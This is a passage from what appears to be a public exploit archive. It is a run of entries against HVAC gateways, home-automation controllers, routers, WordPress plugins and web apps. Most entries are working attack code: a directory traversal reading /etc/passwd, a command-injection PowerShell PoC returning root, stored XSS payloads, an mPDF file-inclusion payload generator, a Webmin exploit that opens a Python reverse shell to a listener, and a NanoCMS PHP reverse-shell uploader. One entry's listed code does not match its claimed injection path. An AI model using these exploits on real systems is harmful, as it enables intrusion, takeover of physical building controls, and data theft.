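        host, relay_index, 1 if on else 0)


def toggle_relay(host, relay):
    """Switch relay `relay` ("1" or "2") on, hold, then off.

    Returns False (after printing) for an unknown relay number.  Raises the
    usual requests exceptions on network errors; main() handles them.
    """
    index = RELAY_INDEX.get(relay)
    if index is None:
        print(Fore.RED + "[!] No such relay" + Style.RESET_ALL)
        return False
    print(Fore.GREEN + "\n[+] Relay {} switched on !".format(relay) + Style.RESET_ALL)
    requests.get(relay_url(host, index, True), timeout=TIMEOUT)
    time.sleep(HOLD_SECONDS)
    # The original printed "switched on" twice for relay 2; the second request is the off command.
    print(Fore.GREEN + "[+] Relay {} switched off !".format(relay) + Style.RESET_ALL)
    requests.get(relay_url(host, index, False), timeout=TIMEOUT)
    print(Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
    return True


def main(host, relay):
    """Clear the screen, show the banner, then toggle the requested relay.

    Exits with status 1 on interrupt, timeout or any other HTTP failure.
    """
    os.system('clear')
    banner()
    print(Fore.YELLOW + "[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
    for _ in range(5):
        time.sleep(1)
        print(Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
    try:
        toggle_relay(host, relay)
    except KeyboardInterrupt:
        sys.exit(1)
    except requests.exceptions.Timeout:
        print("[!] Connection to host timed out !")
        sys.exit(1)
    except requests.exceptions.RequestException as exc:
        print(Fore.RED + "[+] You came up short I'm afraid ! ({})".format(exc) + Style.RESET_ALL)
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) > 2:
        main(sys.argv[1], sys.argv[2])
    else:
        print(Fore.RED + "[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)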
-
Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
# Exploit Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
# Exploit Author: LiquidWorm

Vendor: CAREL INDUSTRIES S.p.A.
Product web page: https://www.carel.com
Affected version: Firmware: A2.1.0 - B2.1.0
                  Application Software: 2.15.4A
                  Software version: v16 13020200

Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems.

Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. The value of the 'file' parameter handled by the 'logdownload.cgi' Bash script is appended to the log directory path without any validation before the file is served (line 23 and line 55 below); the 'dir' value is likewise appended to LOGDIR unfiltered (line 15). The only check is the `-f` test at line 32, which merely confirms that the resolved path is an existing regular file, so `..` sequences pass through. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal. Note that the script splits parameters on `$` rather than `&` (lines 12 and 20), and that the unquoted `$PATHCURRENT/$FILECURRENT` expansions are subject to word splitting.

=======================================================================================
/usr/local/www/usr-cgi/logdownload.cgi:
---------------------------------------
01: #!/bin/bash
02:
03: if [ "$REQUEST_METHOD" = "POST" ]; then
04: read QUERY_STRING
05: REQUEST_METHOD=GET
06: export REQUEST_METHOD
07: export QUERY_STRING
08: fi
09:
10: LOGDIR="/usr/local/root/flash/http/log"
11:
12: tmp=${QUERY_STRING%"$"*}
13: cmd=${tmp%"="*}
14: if [ "$cmd" = "dir" ]; then
15: PATHCURRENT=$LOGDIR/${tmp#*"="}
16: else
17: PATHCURRENT=$LOGDIR
18: fi
19:
20: tmp=${QUERY_STRING#*"$"}
21: cmd=${tmp%"="*}
22: if [ "$cmd" = "file" ]; then
23: FILECURRENT=${tmp#*"="}
24: else
25: if [ -f $PATHCURRENT/lastlog.csv.gz ]; then
26: FILECURRENT=lastlog.csv.gz
27: else
28: FILECURRENT=lastlog.csv
29: fi
30: fi
31:
32: if [ !
-f $PATHCURRENT/$FILECURRENT ]; then 33: echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n" 34: cat carel.inc.html 35: echo "<center>File not available!</center>" 36: cat carel.bottom.html 37: exit 38: fi 39: 40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then 41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then 42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then 43: echo -ne "Content-Type: text/csv\r\n" 44: else 45: echo -ne "Content-Type: image/svg+xml\r\n" 46: fi 47: else 48: echo -ne "Content-Type: image/bmp\r\n" 49: fi 50: else 51: echo -ne "Content-Type: application/x-gzip\r\n" 52: fi 53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n" 54: 55: cat $PATHCURRENT/$FILECURRENT ======================================================================================= Tested on: GNU/Linux 4.11.12 (armv7l) thttpd/2.29 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5709 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php 10.05.2022 -- $ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:65534:65534:nobody:/home:/bin/false guest:x:502:101::/home/guest:/bin/bash carel:x:500:500:Carel:/home/carel:/bin/bash http:x:48:48:HTTP users:/usr/local/www/http:/bin/false httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash sshd:x:1000:1001:SSH drop priv user:/:/bin/false
-
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
# Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution # Exploit Author: LiquidWorm <#SpaceLogic.ps1 Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit Vendor: Schneider Electric SE Product web page: https://www.se.com https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/ https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware Affected version: SpaceLogic C-Bus Home Controller (5200WHC2) formerly known as C-Bus Wiser Home Controller MK2 V1.31.460 and prior Firmware: 604 Summary: SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants. Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems... you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide! The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. 
The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains. Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls.

Desc: The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter of the 'delsnap.pl' Perl/CGI script, which is used for deleting snapshots taken from the webcam.

Reviewer notes: (1) The PoC below sends no credentials — the `-Headers @{Authorization = "Basic XXXX"}` line is commented out — and still receives a 200 with `uid=0(root)` output, so confirm whether /delsnap.pl actually enforces authentication before treating this as post-auth only. (2) In the listing below the user-controlled `$name` reaches `unlink` (line 37), which does not invoke a shell, and the response headers in the PoC (`ETag: W/"..."`, `Access-Control-Allow-Origin: *`, `Connection: keep-alive`) look like they come from the Node.js service rather than thttpd; the code path that executes the `|cmd` payload may therefore differ from the lines shown — verify against the device.
========================================================= /www/delsnap.pl: ---------------- 01: #!/usr/bin/perl 02: use IO::Handle; 03: 04: 05: select(STDERR); 06: $| = 1; 07: select(STDOUT); 08: $| = 1; 09: 10: #print "\r\n\r\n"; 11: 12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/'; 13: use CGI; 14: 15: my $PROGNAME = "delsnap.pl"; 16: 17: my $cgi = new CGI(); 18: 19: my $name = $cgi->param('name'); 20: if ($name eq "list") { 21: print "\r\n\r\n"; 22: print "DATA="; 23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`; 24: exit(0); 25: } 26: if ($name eq "deleteall") { 27: print "\r\n\r\n"; 28: print "DELETINGALL=TRUE&"; 29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`; 30: print "COMPLETED=true\n"; 31: exit(0); 32: } 33: #print "name $name\n"; 34: print "\r\n\r\n"; 35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name"; 36: 37: unlink $filename or die "COMPLETED=false\n"; 38: 39: print "COMPLETED=true\n"; ========================================================= Tested on: Machine: OMAP3 Wiser2 Board CPU: ARMv7 revision 2 GNU/Linux 2.6.37 (armv7l) BusyBox v1.22.1 thttpd/2.25b Perl v5.20.0 Clipsal 81 Angstrom 2009.X-stable PICED 4.14.0.100 lighttpd/1.7 GCC 4.4.3 NodeJS v10.15.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5710 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf CVE ID: CVE-2022-34753 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753 27.03.2022 #> $host.UI.RawUI.ForegroundColor = "Green" if ($($args.Count) -ne 2) { Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n") } else { $ip = $args[0] $cmd = $args[1] $cmdinj = "/delsnap.pl?name=|$cmd" Write-Host("`nSending command '$cmd' to $ip`n") #curl -Headers @{Authorization = "Basic XXXX"} -v 
$ip$cmdinj curl -v $ip$cmdinj } <#PoC PS C:\> .\SpaceLogic.ps1 Usage: .\SpaceLogic.ps1 [IP] [CMD] PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd" Sending command 'uname -a;id;pwd' to 192.168.1.2 VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload VERBOSE: received 129-byte response of content type text/html; charset=utf-8 StatusCode : 200 StatusDescription : OK Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux uid=0(root) gid=0(root) /custom-package RawContent : HTTP/1.1 200 OK Access-Control-Allow-Origin: * Connection: keep-alive Content-Length: 129 Content-Type: text/html; charset=utf-8 Date: Thu, 30 Jun 2022 14:48:43 GMT ETag: W/"81-LTIWJvYlDBYAlgXEy... Forms : {} Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; charset=utf-8]...} Images : {} InputFields : {} Links : {} ParsedHtml : mshtml.HTMLDocumentClass RawContentLength : 129 PS C:\> #>
WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS) # Date: 21/07/2022 # Exploit Author: Steffin Stanly # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://wordpress.org/plugins/wp-useronline/ # Version: <=2.87.6 # Tested on Windows How to reproduce vulnerability: 1. Install WordPress 6.0.1 2. Install and activate WP-UserOnline plugin. 3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site. 4. Add the following payload "><script>alert(1)</script> and save changes 5. On visiting the dashboard, you will observe that the payload was stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS) # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34048 # Tested on: Windows # Poc code <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"> <input type="hidden" name="newUI" value="1" /> <input type="hidden" name="page" value="login" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="langChange" value="0" /> <input type="hidden" name="ipaddr" value="196.219.234.10" /> <input type="hidden" name="login_page" value="x");alert(9);x=("" /> <input type="hidden" name="homepage" value="main.shtml" /> <input type="hidden" name="sysinitpage" value="sysinit.shtml" /> <input type="hidden" name="wizardpage" value="wiz.shtml" /> <input type="hidden" name="hostname" value="59.148.80.138" /> <input type="hidden" name="key" value="M94947765" /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /> <input type="hidden" name="lang_select" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Wavlink WN533A8 - Password Disclosure
# Exploit Title: Wavlink WN533A8 - Password Disclosure # Date: 2022-06-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34046 # Tested on: Windows # Exploit view-source:http://IP_ADDRESS/sysinit.shtml and search for "var syspasswd=" — the username and the password are disclosed there.
WordPress Plugin Duplicator 1.4.7 - Information Disclosure
# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure # Google Dork: N/A # Date: 07.27.2022 # Exploit Author: SecuriTrust # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: <= 1.4.7 # Tested on: Linux, Windows # CVE : CVE-2022-2552 # Reference: https://securitrust.fr # Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552 #Product: WordPress Plugin Duplicator <= 1.4.7 #Vulnerability: 1-Some system information may be disclosed. #Proof-Of-Concept: 1-System information. Some system information is obtained using the "view" parameter. http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download # Google Dork: N/A # Date: 07.27.2022 # Exploit Author: SecuriTrust # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: < 1.4.7 # Tested on: Linux, Windows # CVE : CVE-2022-2551 # Reference: https://securitrust.fr # Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551 #Product: WordPress Plugin Duplicator < 1.4.7 #Vulnerability: 1-It allows an attacker to download the backup file. #Proof-Of-Concept: 1-Backup download. The backup file can be downloaded using the "is_daws" parameter. http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
Wavlink WN530HG4 - Password Disclosure
# Exploit Title: Wavlink WN530HG4 - Password Disclosure # Date: 2022-06-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M30HG4.V5030.191116 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34047 # Tested on: Windows # Exploit view-source:http://IP_address/set_safety.shtml?r=52300 and search for "var syspasswd=" — the username and the password are disclosed there.
CuteEditor for PHP 6.6 - Directory Traversal
# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal # Google Dork: N/A # Date: November 17th, 2021 # Exploit Author: Stefan Hesselman # Vendor Homepage: http://phphtmledit.com/ # Software Link: http://phphtmledit.com/download/phphtmledit.zip # Version: 6.6 # Tested on: Windows Server 2019 # CVE : N/A There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root. File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121 Vulnerable code: [SNIP] function ServerMapPath($input_path,$absolute_path,$virtual_path) { if($absolute_path!="") { return $absolute_path.str_ireplace($virtual_path,"",$input_path); } else { if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN')) { if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF']))); } if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF']))); } return $_SERVER["DOCUMENT_ROOT"].$input_path; } else { return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; } } } [SNIP] ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file. 
File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56 Vulnerable function (renamefile, line 57): [SNIP] switch ($action) { [SNIP] case "renamefile": rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath)); print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>"; break; [SNIP] $input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes: C:\Inetpub\wwwroot\..\..\..\poc.html Final result: writes poc.html to the webroot. STEPS: 1. Create a poc.html file (XSS PoC will do). <HTML> <title>Path Traversal PoC</title> <BODY> <h1>PoC</h1> <script>alert('directory traversal');</script> </BODY> </HTML> 2. Upload poc.html via the "Insert Templates" page using the "Upload files" option. 3. Select poc.html and select "Rename File". 4. Click on the pencil icon to the right of the poc.html file. 5. Rename file to "..\..\..\poc.html". 6. Press OK. poc.html is written three directories up. This may require more or fewer "..\" (or "../") segments depending on the depth of your directory tree; adjust the number of segments as needed.
mPDF 7.0 - Local File Inclusion
# Exploit Title: mPDF 7.0 - Local File Inclusion # Google Dork: N/A # Date: 2022-07-23 # Exploit Author: Musyoka Ian # Vendor Homepage: https://mpdf.github.io/ # Software Link: https://mpdf.github.io/ # Version: CuteNews # Tested on: Ubuntu 20.04, mPDF 7.0.x # CVE: N/A #!/usr/bin/env python3 from urllib.parse import quote from cmd import Cmd from base64 import b64encode class Terminal(Cmd): prompt = "\nFile >> " def default(self, args): payload_gen(args) def banner(): banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __| | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__| | | |_| """ print(banner) def payload_gen(fname): payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />' encoded_payload = quote(payload) print("[+] Replace the content with the payload below") print(f"Url encoded payload:\n{encoded_payload}\n") base64enc = b64encode(encoded_payload.encode()) print(f"Base64 encoded payload:\n{base64enc.decode()}\n") if __name__ == ("__main__"): banner() print("Enter Filename eg. /etc/passwd") terminal= Terminal() terminal.cmdloop()
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-25 # Exploit Author: Emir Polat # Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 # Vendor Homepage: https://www.webmin.com/ # Software Link: https://www.webmin.com/download.html # Version: < 1.997 # Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) # CVE: CVE-2022-36446 import argparse import requests from bs4 import BeautifulSoup def login(args): global session global sysUser session = requests.Session() loginUrl = f"{args.target}:10000/session_login.cgi" infoUrl = f"{args.target}:10000/sysinfo.cgi" username = args.username password = args.password data = {'user': username, 'pass': password} login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'}) sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']}) bs = BeautifulSoup(sysInfo.text, 'html.parser') sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs] if sysUser: return True else: return False def exploit(args): payload = f""" 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'); """ updateUrl = f"{args.target}:10000/package-updates" exploitUrl = f"{args.target}:10000/package-updates/update.cgi" exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'} if login(args): print("[+] Successfully Logged In !") print(f"[+] Session Cookie => sid={session.cookies['sid']}") print(f"[+] User Found => {sysUser[0]}") res = session.get(updateUrl) bs = BeautifulSoup(res.text, 'html.parser') updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs] if updateAccess[0] == "package-updates": 
print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>") print(f"[+] Exploit starting ... ") print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}") session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'}) session.post(exploitUrl, data=exploitData) else: print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>") else: print("[-] Login Failed !") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)") parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True) parser.add_argument('-u', '--username', help='Username For Login', required=True) parser.add_argument('-p', '--password', help='Password For Login', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False) args = parser.parse_args() exploit(args)
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-26 # Exploit Auuthor: p1ckzi # Vendor Homepage: https://github.com/kalyan02/NanoCMS # Version: NanoCMS v0.4 # Tested on: Linux Mint 20.3 # CVE: N/A # # Description: # this script uploads a php reverse shell to the target. # NanoCMS does not sanitise the data of an authenticated user while creating # webpages. pages are saved with .php extensions by default, allowing an # authenticated attacker access to the underlying system: # https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt #!/usr/bin/env python3 import argparse import bs4 import errno import re import requests import secrets import sys def arguments(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=f"{sys.argv[0]} exploits authenticated file upload" "\nand remote code execution in NanoCMS v0.4", epilog=f"examples:" f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php" f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a" f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'" ) parser.add_argument( "address", help="schema/ip/hostname, port, sub-directories" " to the vulnerable NanoCMS server" ) parser.add_argument( "file", help="php file to upload" ) parser.add_argument( "-u", "--user", help="username", default="admin" ) parser.add_argument( "-p", "--passwd", help="password", default="demo" ) parser.add_argument( "-e", "--execute", help="attempts to make a request to the uploaded" " file (more useful if uploading a reverse shell)", action="store_true", default=False ) parser.add_argument( "-a", "--accessible", help="turns off features" " which may negatively affect screen readers", action="store_true", default=False ) parser.add_argument( "-n", "--no-colour", help="removes colour output", action="store_true", default=False ) arguments.option = parser.parse_args() # settings for terminal 
output defined by user in term_settings(). class settings(): # colours. c0 = "" c1 = "" c2 = "" # information boxes. i1 = "" i2 = "" i3 = "" i4 = "" # checks for terminal setting flags supplied by arguments(). def term_settings(): if arguments.option.accessible: small_banner() elif arguments.option.no_colour: settings.i1 = "[+] " settings.i2 = "[!] " settings.i3 = "[i] " settings.i4 = "$ " banner() elif not arguments.option.accessible or arguments.option.no_colour: settings.c0 = "\u001b[0m" # reset. settings.c1 = "\u001b[38;5;1m" # red. settings.c2 = "\u001b[38;5;2m" # green. settings.i1 = "[+] " settings.i2 = "[!] " settings.i3 = "[i] " settings.i4 = "$ " banner() else: print("something went horribly wrong!") sys.exit() # default terminal banner (looks prettier when run lol) def banner(): print( "\n .__ .__" " .__ " "\n ____ _____ ____ ____ ____ _____ _____| |__ ____ | " "| | | " "\n / \\__ \\ / \\ / _ \\_/ ___\\ / \\ / ___/ | \\_/ " "__ \\| | | | " "\n| | \\/ __ \\| | ( <_> ) \\___| Y Y \\___ \\| Y \\ _" "__/| |_| |__" "\n|___| (____ /___| /\\____/ \\___ >__|_| /____ >___| /\\___ " ">____/____/" "\n \\/ \\/ \\/ \\/ \\/ \\/ \\/ " " \\/" ) def small_banner(): print( f"{sys.argv[0]}" "\nNanoCMS authenticated file upload and rce..." ) # appends a '/' if not supplied at the end of the address. def address_check(address): check = re.search('/$', address) if check is not None: print('') else: arguments.option.address += "/" # creates a new filename for each upload. # errors occur if the filename is the same as a previously uploaded one. def random_filename(): random_filename.name = secrets.token_hex(4) # note: after a successful login, credentials are saved, so further reuse # of the script will most likely not require correct credentials. 
def login(address, user, passwd): post_header = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) " "Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml," "application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "", "Connection": "close", "Referer": f"{arguments.option.address}data/nanoadmin.php", "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5", "Upgrade-Insecure-Requests": "1", } post_data = { "user": f"{user}", "pass": f"{passwd}" } url_request = requests.post( address + 'data/nanoadmin.php?', headers=post_header, data=post_data, verify=False, timeout=30 ) signin_error = url_request.text if 'Error : wrong Username or Password' in signin_error: print( f"{settings.c1}{settings.i2}could " f"sign in with {arguments.option.user}/" f"{arguments.option.passwd}.{settings.c0}" ) sys.exit(1) else: print( f"{settings.c2}{settings.i1}logged in successfully." 
f"{settings.c0}" ) def exploit(address, file, name): with open(arguments.option.file, 'r') as file: file_contents = file.read().rstrip() post_header = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) " "Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml," "application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "", "Connection": "close", "Referer": f"{arguments.option.address}data/nanoadmin.php?action=" "addpage", "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5", "Upgrade-Insecure-Requests": "1", } post_data = { "title": f"{random_filename.name}", "save": "Add Page", "check_sidebar": "sidebar", "content": f"{file_contents}" } url_request = requests.post( address + 'data/nanoadmin.php?action=addpage', headers=post_header, data=post_data, verify=False, timeout=30 ) if url_request.status_code == 404: print( f"{settings.c1}{settings.i2}{arguments.option.address} could " f"not be uploaded.{settings.c0}" ) sys.exit(1) else: print( f"{settings.c2}{settings.i1}file posted." f"{settings.c0}" ) print( f"{settings.i3}if successful, file location should be at:" f"\n{address}data/pages/{random_filename.name}.php" ) def execute(address, file, name): print( f"{settings.i3}making web request to uploaded file." ) print( f"{settings.i3}check listener if reverse shell uploaded." ) url_request = requests.get( address + f'data/pages/{random_filename.name}.php', verify=False ) if url_request.status_code == 404: print( f"{settings.c1}{settings.i2}{arguments.option.file} could " f"not be found." f"\n{settings.i2}antivirus may be blocking your upload." 
